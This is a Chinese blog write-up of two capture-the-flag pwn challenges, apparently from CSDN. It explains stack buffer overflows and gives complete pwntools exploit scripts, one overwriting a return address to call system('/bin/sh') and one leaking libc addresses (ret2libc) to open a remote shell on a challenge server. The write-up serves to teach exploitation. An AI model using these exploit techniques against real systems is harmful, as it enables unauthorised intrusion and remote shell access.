栈溢出之构造函数覆盖返回地址

最新推荐文章于 2022-09-09 20:31:54 发布
最新推荐文章于 2022-09-09 20:31:54 发布
阅读量766 收藏 5
点赞数
分类专栏: 二进制安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iczfy585/article/details/109188726
版权

栈溢出利用已知函数覆盖返回地址

题目:攻防世界 level2
查看文件的保护,发现没有栈哨,可以考虑覆盖返回地址。
在这里插入图片描述

利用IDA进行静态分析,找到vulnerable_function()函数

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  system("echo Input:");
  return read(0, &buf, 0x100u);
}

read函数读入了0x100的大小到缓冲区,但是缓冲区只有0x88的大小。这里存在缓冲区溢出。

在函数窗口找到_system函数的地址为0x08048320。(注意找到是.plt段)。也可以通过pwntools来找system的函数地址

from pwn import *
elf = ELF('level2')
hex(elf.symbols['system'])

然后通过IDA的字符串视图可以找到“/bin/sh”的地址(Shift+F12):0x0804A024

利用代码

#!/usr/bin/python 2.7
#-*-coding=utf-8-*-
from pwn import *
context.log_level='debug'

r = remote('',)
r.recvuntil('echo Input:')
return_addr = 0x08048320 # system函数的地址
bash_addr = 0x0804A024 #/bin/sh的地址

## 0x80填充缓冲区, 0x4填充BP, 接着是覆盖返回地址为system的地址,然后是system函数的返回地址(这里可以是任意的32bit的数据,最后是sysetm的参数地址)
payload = 0x80 * 'a' + 0x4 * 'a' + p32(return_addr)+p32(0)+p32(bash_addr)

r.sendline(payload)
r.interactive()

在这里插入图片描述

栈溢出之利用Libc地址泄露构造函数

题目:攻防世界 level3
查看文件的保护,发现没有栈哨Canary,RELRO为partial,开启了部分地址随机化。也就是程序每次运行时加载的库函数的地址时随机的。

在这里插入图片描述
这里没有发现system函数和字符串"/bin/sh",但是题目提供了一个动态链接库libc_32.so.6。只能通过这个库来入手。

因为程序开启了地址随机化,每次运行库函数的地址时不固定的,但是函数或者字符串的相对位置是固定的。利用这一点,我们首先通过栈溢出覆盖返回地址,控制程序执行流程,使其调用库函数中的write函数从而泄露出write函数的地址,并重新返回到main函数,让程序继续执行。这样一次溢出就可以得到write函数在程序运行时的地址。然后根据库函数相对位置固定,就可以计算出system函数和/bin/sh在程序运行时的地址。再次利用栈溢出覆盖返回地址为system函数的地址,并且传递参数/bin/sh。拿到服务器的shell。

  1. 首先我们需要找到system函数和字符串/bin/sh被程序加载后的地址。通过libc_32.so.6库可以找到write函数和system函数的地址(write@@GLIBC_2.0和system@@GLIBC_2.0)。
readelf -s libc_32.so.6 | grep system
readelf -s libc_32.so.6 | grep write
  1. 对于字符串/bin/sh,可以通过如下命令来得到地址,然后通过与库中的write函数地址比较得到相对地址。当然我们可以通过pwntools来得到库函数的地址。
strings -at x libc_32.so.6 | grep /bin/sh
  1. 利用脚本
#! /usr/bin/python2.7
#-*-coding=utf-8-*-
from pwn import *
context.log_level='debug'

r = remote('220.249.52.133',35373)
r.recvuntil('\n')

elf = ELF('level3')
#plt表是用来调用got表中的函数
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.sym['main']

#0x88覆盖缓冲区,0x4覆盖bp,接着用write_plt覆盖返回地址,使得其调用write函数,接着是write执行完毕后
#返回到main函数,是程序能够继续执行,为第二次溢出做准备.后面三个是write函数的参数。第一个参数代表输出
#第二个参数代表输出的内容,第三个参数代表输出的长度
payload = 'a'*0x88 + 'b'*0x4 + p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(10)
r.sendline(payload)
base_addr = u32(r.recv()[:4]) #u32是p32的逆运算,[:4]代表取4个字节

libc = ELF('libc_32.so.6')
system_addr = base_addr + (libc.sym['system'] - libc.sym['write'] )

shell_addr = base_addr + 0x84c6b # 找出/bin/sh的地址 - libc.sym['write'] 结果为 0x84c6b

payload = 'a'*0x88 + 'b'*0x4 + p32(system_addr)+p32(0)+p32(shell_addr)
r.recvuntil('\n')
r.sendline(payload)
r.interactive()

在这里插入图片描述

关于plt和got的知识,参考文章:got表和plt表

iringzh
关注
专栏目录
栈溢出基础
m0_56069948的博客
05-28 229
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 栈溢出基础 之前已经介绍了C语言函数调用栈,本文将正式介绍栈溢出攻击。 当函数调用结束时,将发生函数跳转,通过读取存放在栈上的信息(返回地址),跳转执行下一条指令。通过
初识栈溢出及利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 5850
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
栈溢出覆盖函数返回地址
iczfy585的博客
10-18 3307
栈溢出覆盖函数返回地址原理利用 原理 栈溢出栈溢出就是栈上的缓冲区填入过多的数据,超出了边界,从而导致了栈上原有数据被覆盖。 函数调用的时候,会开辟一个栈帧结构。首先会将调用的函数的参数入栈,然后依次压入调用函数的返回地址和当前栈底指针寄存器(BP)的值入栈。其中压入返回地址是通过call指令来实现的。 在函数调用结束的时候,将栈指针SP重新指向帧指针BP的位置,并弹出BP和返回地址IP。这样函数状态将恢复成进入子函数的状态,实现了函数栈的切换。 当用call指令调用一个函数的时候,首先会将IP寄存
Windows漏洞利用开发系列教程第二部分:栈溢出覆盖返回地址
01-11
翻过国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
栈溢出覆盖返回地址
新博客:https://aping-dev.com/
05-26 2274
#include<stdio.h> #include<stdlib.h> int stack_over_flow() { char Password[16] = { 0, }; gets(Password); return 0; } void readfile() { FILE* fp; char FileStr[20] = { 0, }; pri...
pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址
tbsqigongzi的博客
04-23 808
攻防世界pwn进阶区stack2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行程序,先输入数字总量,之后输入数字,会有一个菜单栏,分别实现对数字展示,添加,改变,取平均值,和退出程序五种功能。 ida看一下主函数 观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得
长亭实习-两周记录
笑花大王
07-04 2209
除了拒绝就是拒绝 因为疫情都在家呆半年了 总琢磨着在从疫情中获得对于我未来的转机。。。 1.4月份就开始头简历了 通过网站投啊投 最早就想投长亭 通过网站投了两次长亭长亭没理我 hhhhh 2.投了奇安信 好不容易等来笔试 数据接口算法偏多 当时这门课没学好 啊啊啊后悔啊 挂在笔试。。。 3.找之前北京做健身的时候认识的一个大哥 他就是字节跳动的 内推了一把 没要我。。。 4.省...
栈溢出、整型溢出、UAF溢出覆盖返回地址覆盖函数指针、覆盖SEH、格式化字符串溢出栈溢出利用
最新发布
10-17
这些都是常见的漏洞类型,其中栈溢出、整型溢出、UAF溢出覆盖返回地址、格式化字符串溢出是比较常见的。栈溢出利用和覆盖函数指针、覆盖SEH则需要具体情况具体分析。 栈溢出:当程序向栈中写入超过其分配的空间时...
栈溢出crash小合集
11-15
5. **安全编程**:探讨防止栈溢出的安全措施,如使用栈保护(如Canary值)、地址空间布局随机化(ASLR)和安全编程实践(如限制输入长度,使用安全字符串函数等)。 6. **模糊测试**:AFL的工作原理和应用,如何...
栈溢出漏洞
03-30
在“湖湘杯2016网络安全技能大赛pwnme”这个挑战中,参赛者可能需要理解栈溢出的工作原理,分析提供的程序代码,寻找可能的溢出点,然后构造特定的输入数据来覆盖返回地址,实现控制程序执行流程的目的。这需要扎实...
linux 64位 栈溢出,栈溢出中64位程序的处理方法
weixin_39717865的博客
05-13 1413
在做 pwn 题时,难免会遇到64位的栈溢出程序,处理32位和64位程序会有所不同。这里总结一下64位和32位程序的差异,并结合两道例题给出解题方法0x00 差异1.64 位函数调用需要使用寄存器传参,前三个参数存放在寄存器 rdi、rsi、rdx 中,32 位函数调用使用栈传参(具体看下面的例子)2.64程序一个存储单元占8个字节,32位占4个字节。所以在填充 ebp(rbp) 时会有差异,这是...
网页木马攻防实战学习笔记二:缓冲区溢出
xlsj雪松的博客
08-23 441
1 常见案例 1.1 栈溢出 栈是一个在进程映象内存的高地址内的后进先出(LIFO) 的缓冲区。 #include<stdio.h> #include <string.h> char evil[] =”AAAAAAAAAAAAAAAAAAAAAAAA" ; void main() { char buff[4]; strcpy (buff,evil); ...
PWN入门(4)覆盖程序函数的返回地址
Ba1_Ma0的博客
09-09 1033
有什么不会或者是错误的地方的可以私信我,看到必回。
覆盖*printf()系列函数本身的返回地址(转)
cuanjun1153的博客
09-19 518
覆盖*printf()系列函数本身的返回地址(转)[@more@]  ★ 前言  在scut写的<>中列出了六种比较通用的方法来获得控制权:  1. 覆盖GOT  2. 利用DTORS  3. 利用 C librar...
函数调用、函数传参与函数返回的实现机制
huqinwei的专栏
03-03 5599
最近才开始用汇编分析具体过程,之前的一些问题,只到达把参数存储到栈顶,准备调用函数之类的模糊认知,今天打算再细分析一下。 首先是变量初始化: 这里有一个问题,就是i,j,k在栈中顺序倒置了i最先,按理说是高地址(linux栈向下生长) 然后是两个参数入栈,这个顺序没得说,由右向左入,保证最左边的参数地址最低,在esp指向的内存。 参数入栈之后就是
如何获得system和bin/sh的地址
Sakura给爷pwn全场
09-13 1225
如何获得system和bin/sh的地址
攻防世界 Pwn level2
MrTreebook的博客
07-16 514
攻防世界pwn level2 1.file 和 checksec 先走一遍 是一个32位的文件 看到 RELRO的状态是 Partial 2.放进IDA32看一下 有一个system函数 进入vulnerable_function看一下 buf可以溢出 进入栈空间看看 136byte的buf再加上4byte的数据溢出返回system的地址 本题开始前就提示我们用ROP 现在去plt表上暴露system的地址 3.编写exp 先构造paylod system_plt = elf.plt["syst
ret2xx----- Pwn中常见的CTF模板命题
weixin_52321473的博客
04-07 1174
其实 这周末我原本是不想写文章的 主要是放假了 但是 我想往常一样登录了百度站长。。。。 我去!!! 我的文章被索引了!!!! 所以呢 我决定多更新点文章出来 而且最近不是有人说看不懂吗 我觉得更新一些可以让人懂的一些东西 但是今天 我还决定把Ret2讲完 本次教学节选于星梦安全团队在Bilibili上发表的视频 部分转载于https://www.anquanke.com/post/id/205858#h2-2 url为 https://www.bilibili.com/video/BV1Uv411j
【Error】gdb.attach错误 Failed to read a valid object file image from memory.
think_ycx的专栏
11-05 6947
python脚本中pwntools gdb.attach遇到错误:Failed to read a valid object file image from memory. ****** Your encoding (ANSI_X3.4-1968) is different than UTF-8. pwndbg might not work properly. You might try la...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值